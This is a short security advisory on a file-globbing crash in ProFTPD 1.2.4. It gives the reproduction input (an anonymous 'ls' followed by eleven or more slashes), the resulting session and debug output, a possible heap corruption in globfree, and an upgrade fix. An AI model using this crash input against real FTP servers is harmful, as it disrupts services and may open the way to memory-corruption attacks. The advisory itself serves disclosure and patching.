|
|
| |
| A problem in handling file globbing exists in the current version of ProFTPD 1.2.4. This is very similar to the wu-ftpd bug ("ls ~{") and occurs when you issuing the command: ls /////////// (11 or more '/'). |
| |
Credit:
The information has been provided by Mattias _.
|
| |
Vulnerable systems:
ProFTPD 1.2.4
ProFTPD 1.2.2rc3
Immune systems:
ProFTPD 1.2.5rc1
Impact:
The ftpd-child dies with signal 11 (SEGV), but the server stays up.
A segmentation fault occurs when the server tries to free a unallocated memory with a free()-function and it could be a heap corruption vulnerability. It is in the file lib/glibc-glob.c in function void globfree (pglob) the SEGV occurs.
Recreate:
Login as ftp(anonymous) and issue the command:
ftp> ls ///////////
200 PORT command successful.
150 Opening ASCII mode data connection for file list.
421 Service not available, remote server has closed connection
ftp>
And the debug messages reads (proftpd -n -d 5):
dispatching PRE_CMD command 'LIST ///////////' to mod_core
dispatching CMD command 'LIST ///////////' to mod_ls
active data connection opened - local : 127.0.0.1:20
active data connection opened - remote : 127.0.0.1:1286
in dir_check_full(): path = '/', fullpath = '/home/ftp/'.
ProFTPD terminating (signal 11)
Solution:
Upgrade to version 1.2.5rc1.
|
|
|
